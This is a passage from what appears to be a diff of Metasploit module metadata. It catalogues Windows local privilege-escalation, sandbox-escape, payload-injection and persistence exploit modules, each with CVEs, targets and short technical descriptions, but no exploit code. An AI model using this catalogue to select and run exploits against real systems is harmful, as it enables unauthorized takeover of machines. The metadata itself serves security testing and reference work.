"BID-64115", + "URL-https://github.com/tyranid/IE11SandboxEscapes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 - 11" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb", + "is_install_path": true, + "ref_name": "windows/local/ms13_097_ie_registry_symlink", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_009_ie_dfsvc": { + "name": "MS14-009 .NET Deployment Service IE Sandbox Escape", + "fullname": "exploit/windows/local/ms14_009_ie_dfsvc", + "aliases": [], + "rank": 500, + "disclosure_date": "2014-02-11", + "type": "exploit", + "author": [ + "James Forshaw", + "juan vazquez " + ], + "description": "This module abuses a process creation policy in Internet Explorer's sandbox, specifically\n in the .NET Deployment Service (dfsvc.exe), which allows the attacker to escape the\n Enhanced Protected Mode, and execute code with Medium Integrity.", + "references": [ + "CVE-2014-0257", + "MSB-MS14-009", + "BID-65417", + "URL-https://github.com/tyranid/IE11SandboxEscapes" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "IE 8 - 11" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb", + "is_install_path": true, + "ref_name": "windows/local/ms14_009_ie_dfsvc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_058_track_popup_menu": { + "name": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", + "fullname": "exploit/windows/local/ms14_058_track_popup_menu", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-10-14", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez ", + "Spencer McIntyre", + "OJ Reeves " + ], + "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.", + "references": [ + "CVE-2014-4113", + "OSVDB-113167", + "BID-70364", + "MSB-MS14-058", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms14_058_track_popup_menu.rb", + "is_install_path": true, + "ref_name": "windows/local/ms14_058_track_popup_menu", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms14_070_tcpip_ioctl": { + "name": "MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference", + "fullname": "exploit/windows/local/ms14_070_tcpip_ioctl", + "aliases": [], + "rank": 200, + "disclosure_date": "2014-11-11", + "type": "exploit", + "author": [ + "Matt Bergin ", + "Jay Smith " + ], + "description": "A vulnerability within the Microsoft TCP/IP protocol driver tcpip.sys\n can allow a local attacker to trigger a NULL pointer dereference by using a\n specially crafted IOCTL. This flaw can be abused to elevate privileges to\n SYSTEM.", + "references": [ + "CVE-2014-4076", + "MSB-MS14-070", + "OSVDB-114532", + "URL-https://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev", + "URL-https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2003 SP2" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb", + "is_install_path": true, + "ref_name": "windows/local/ms14_070_tcpip_ioctl", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_004_tswbproxy": { + "name": "MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape", + "fullname": "exploit/windows/local/ms15_004_tswbproxy", + "aliases": [], + "rank": 400, + "disclosure_date": "2015-01-13", + "type": "exploit", + "author": [ + "Unknown", + "Henry Li", + "juan vazquez " + ], + "description": "This module abuses a process creation policy in Internet Explorer's\n sandbox; specifically, Microsoft's RemoteApp and Desktop Connections runtime\n proxy, TSWbPrxy.exe. This vulnerability allows the attacker to escape the\n Protected Mode and execute code with Medium Integrity. At the moment, this\n module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This\n module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE\n 11.", + "references": [ + "CVE-2015-0016", + "MSB-MS15-004", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Protected Mode (Windows 7) / 32 bits" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms15_004_tswbproxy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms15_004_tswbproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_051_client_copy_image": { + "name": "Windows ClientCopyImage Win32k Exploit", + "fullname": "exploit/windows/local/ms15_051_client_copy_image", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-05-12", + "type": "exploit", + "author": [ + "Unknown", + "hfirefox", + "OJ Reeves", + "Spencer McIntyre" + ], + "description": "This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.", + "references": [ + "CVE-2015-1701", + "MSB-MS15-051", + "URL-https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html", + "URL-https://github.com/hfiref0x/CVE-2015-1701", + "URL-https://technet.microsoft.com/library/security/MS15-051" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms15_051_client_copy_image.rb", + "is_install_path": true, + "ref_name": "windows/local/ms15_051_client_copy_image", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms15_078_atmfd_bof": { + "name": "MS15-078 Microsoft Windows Font Driver Buffer Overflow", + "fullname": "exploit/windows/local/ms15_078_atmfd_bof", + "aliases": [], + "rank": 0, + "disclosure_date": "2015-07-11", + "type": "exploit", + "author": [ + "Eugene Ching", + "Mateusz Jurczyk", + "Cedric Halbronn", + "juan vazquez " + ], + "description": "This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing\n a malformed font. The vulnerability was exploited by the hacking team and disclosed in\n the July data leak. This module has been tested successfully on vulnerable builds of\n Windows 8.1 x64.", + "references": [ + "CVE-2015-2426", + "CVE-2015-2433", + "MSB-MS15-078", + "MSB-MS15-080", + "URL-https://github.com/vlad902/hacking-team-windows-kernel-lpe", + "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=369", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=480" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 8.1 x64" + ], + "mod_time": "2023-10-12 17:33:58 +0000", + "path": "/modules/exploits/windows/local/ms15_078_atmfd_bof.rb", + "is_install_path": true, + "ref_name": "windows/local/ms15_078_atmfd_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_014_wmi_recv_notif": { + "name": "Windows WMI Receive Notification Exploit", + "fullname": "exploit/windows/local/ms16_014_wmi_recv_notif", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-12-04", + "type": "exploit", + "author": [ + "smmrootkit", + "de7ec7ed", + "de7ec7ed" + ], + "description": "This module exploits an uninitialized stack variable in the WMI subsystem of ntoskrnl.\n This module has been tested on vulnerable builds of Windows 7 SP0 x64 and Windows 7 SP1 x64.", + "references": [ + "CVE-2016-0040", + "MSB-MS16-014", + "URL-https://github.com/de7ec7ed/CVE-2016-0040", + "URL-https://github.com/Rootkitsmm/cve-2016-0040", + "URL-https://technet.microsoft.com/en-us/library/security/ms16-014.aspx" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP0/SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_014_wmi_recv_notif", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_016_webdav": { + "name": "MS16-016 mrxdav.sys WebDav Local Privilege Escalation", + "fullname": "exploit/windows/local/ms16_016_webdav", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-09", + "type": "exploit", + "author": [ + "Tamas Koczka", + "William Webb " + ], + "description": "This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn\n a process on the target system and elevate its privileges to NT AUTHORITY\\SYSTEM before executing\n the specified payload within the context of the elevated process.", + "references": [ + "CVE-2016-0051", + "MSB-MS16-016" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 SP1" + ], + "mod_time": "2021-07-21 12:35:47 +0000", + "path": "/modules/exploits/windows/local/ms16_016_webdav.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_016_webdav", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_032_secondary_logon_handle_privesc": { + "name": "MS16-032 Secondary Logon Handle Privilege Escalation", + "fullname": "exploit/windows/local/ms16_032_secondary_logon_handle_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-03-21", + "type": "exploit", + "author": [ + "James Forshaw", + "b33f", + "khr0x40sh" + ], + "description": "This module exploits the lack of sanitization of standard handles in Windows' Secondary\n Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12\n 32 and 64 bit. This module will only work against those versions of Windows with\n Powershell 2.0 or later and systems with two or more CPU cores.", + "references": [ + "MSB-MS16-032", + "CVE-2016-0099", + "URL-https://twitter.com/FuzzySec/status/723254004042612736", + "URL-https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_032_secondary_logon_handle_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_032_secondary_logon_handle_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_075_reflection": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC", + "fullname": "exploit/windows/local/ms16_075_reflection", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "Mumbai" + ], + "description": "Module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege. Currently the module\n does not spawn as SYSTEM, however once achieving a shell, one can easily\n use incognito to impersonate the token.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows x86", + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms16_075_reflection_juicy": { + "name": "Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)", + "fullname": "exploit/windows/local/ms16_075_reflection_juicy", + "aliases": [], + "rank": 500, + "disclosure_date": "2016-01-16", + "type": "exploit", + "author": [ + "FoxGloveSec", + "breenmachine", + "decoder", + "ohpe", + "phra", + "lupman" + ], + "description": "This module utilizes the Net-NTLMv2 reflection between DCOM/RPC\n to achieve a SYSTEM handle for elevation of privilege.\n It requires a CLSID string.\n Windows 10 after version 1803, (April 2018 update, build 17134) and all\n versions of Windows Server 2019 are not vulnerable.", + "references": [ + "MSB-MS16-075", + "CVE-2016-3225", + "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/", + "URL-https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", + "URL-https://github.com/breenmachine/RottenPotatoNG", + "URL-https://decoder.cloud/2017/12/23/the-lonely-potato/", + "URL-https://ohpe.it/juicy-potato/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms16_075_reflection_juicy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms16_075_reflection_juicy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ms18_8120_win32k_privesc": { + "name": "Windows SetImeInfoEx Win32k NULL Pointer Dereference", + "fullname": "exploit/windows/local/ms18_8120_win32k_privesc", + "aliases": [], + "rank": 400, + "disclosure_date": "2018-05-09", + "type": "exploit", + "author": [ + "unamer", + "bigric3", + "Anton Cherepanov", + "Dhiraj Mishra " + ], + "description": "This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2\n when the Win32k component fails to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run arbitrary code in kernel mode. An\n attacker could then install programs; view, change, or delete data; or create new\n accounts with full user rights.\n\n This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.", + "references": [ + "BID-104034", + "CVE-2018-8120", + "URL-https://github.com/unamer/CVE-2018-8120", + "URL-https://github.com/bigric3/cve-2018-8120", + "URL-http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html", + "URL-https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 7 x64", + "Windows 7 x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ms18_8120_win32k_privesc", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/ms_ndproxy": { + "name": "MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/ms_ndproxy", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-11-27", + "type": "exploit", + "author": [ + "Unknown", + "ryujin", + "Shahin Ramezany", + "juan vazquez " + ], + "description": "This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003\n SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while\n processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used\n to access an array unsafely, and the value is used to perform a call, leading to a NULL\n pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This\n module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to\n work the service \"Routing and Remote Access\" must be running on the target system.", + "references": [ + "CVE-2013-5065", + "MSB-MS14-002", + "OSVDB-100368", + "BID-63971", + "EDB-30014", + "URL-http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/", + "URL-http://technet.microsoft.com/en-us/security/advisory/2914486", + "URL-http://www.secniu.com/blog/?p=53", + "URL-http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html", + "URL-http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3", + "Windows Server 2003 SP2" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ms_ndproxy.rb", + "is_install_path": true, + "ref_name": "windows/local/ms_ndproxy", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/novell_client_nicm": { + "name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/novell_client_nicm", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-05-22", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.", + "references": [ + "CVE-2013-3956", + "OSVDB-93718", + "URL-http://www.novell.com/support/kb/doc.php?id=7012497", + "URL-http://pastebin.com/GB4iiEwR" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 7 SP1" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/novell_client_nicm.rb", + "is_install_path": true, + "ref_name": "windows/local/novell_client_nicm", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/novell_client_nwfs": { + "name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation", + "fullname": "exploit/windows/local/novell_client_nwfs", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-26", + "type": "exploit", + "author": [ + "Ruben Santamarta", + "juan vazquez " + ], + "description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.", + "references": [ + "CVE-2008-3158", + "OSVDB-46578", + "BID-30001" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP3" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/novell_client_nwfs.rb", + "is_install_path": true, + "ref_name": "windows/local/novell_client_nwfs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/nscp_pe": { + "name": "NSClient++ 0.5.2.35 - Privilege escalation", + "fullname": "exploit/windows/local/nscp_pe", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-20", + "type": "exploit", + "author": [ + "kindredsec", + "BZYO", + "Yann Castel (yann.castel " + ], + "description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n For this module to work, both the NSClient++ web interface and `ExternalScripts` features must be enabled.\n You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.", + "references": [ + "EDB-48360", + "EDB-46802" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/local/nscp_pe.rb", + "is_install_path": true, + "ref_name": "windows/local/nscp_pe", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ntapphelpcachecontrol": { + "name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check", + "fullname": "exploit/windows/local/ntapphelpcachecontrol", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-09-30", + "type": "exploit", + "author": [ + "James Forshaw", + "sinn3r " + ], + "description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level\n of the token so it's possible to get an identify token on your thread from a local system\n process and bypass this check.\n\n This module currently only affects Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).", + "references": [ + "MSB-MS15-001", + "CVE-2015-0002", + "OSVDB-116497", + "EDB-35661", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=118" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 8 / Windows 8.1 (x86 and x64)" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb", + "is_install_path": true, + "ref_name": "windows/local/ntapphelpcachecontrol", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ntusermndragover": { + "name": "Microsoft Windows NtUserMNDragOver Local Privilege Elevation", + "fullname": "exploit/windows/local/ntusermndragover", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-03-12", + "type": "exploit", + "author": [ + "Clément Lecigne", + "Grant Willcox", + "timwr" + ], + "description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.", + "references": [ + "CVE-2019-0808", + "URL-https://github.com/exodusintel/CVE-2019-0808", + "URL-https://github.com/ze0r/cve-2019-0808-poc", + "URL-http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html", + "URL-https://blog.exodusintel.com/2019/05/17/windows-within-windows/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ntusermndragover.rb", + "is_install_path": true, + "ref_name": "windows/local/ntusermndragover", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/nvidia_nvsvc": { + "name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation", + "fullname": "exploit/windows/local/nvidia_nvsvc", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-12-25", + "type": "exploit", + "author": [ + "Peter Wintersmith", + "Ben Campbell " + ], + "description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stacked based buffer overflow as a result\n of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.", + "references": [ + "CVE-2013-0109", + "OSVDB-88745", + "URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/nvidia_nvsvc.rb", + "is_install_path": true, + "ref_name": "windows/local/nvidia_nvsvc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/panda_psevents": { + "name": "Panda Security PSEvents Privilege Escalation", + "fullname": "exploit/windows/local/panda_psevents", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-06-27", + "type": "exploit", + "author": [ + "h00die ", + "Security-Assessment.com" + ], + "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/panda_psevents.rb", + "is_install_path": true, + "ref_name": "windows/local/panda_psevents", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/payload_inject": { + "name": "Windows Manage Memory Payload Injection", + "fullname": "exploit/windows/local/payload_inject", + "aliases": [ + "post/windows/manage/payload_inject" + ], + "rank": 600, + "disclosure_date": "2011-10-12", + "type": "exploit", + "author": [ + "Carlos Perez ", + "sinn3r " + ], + "description": "This module will inject a payload into memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/payload_inject.rb", + "is_install_path": true, + "ref_name": "windows/local/payload_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence": { + "name": "Windows Persistent Registry Startup Payload Installer", + "fullname": "exploit/windows/local/persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "Carlos Perez ", + "g0tmi1k" + ], + "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": 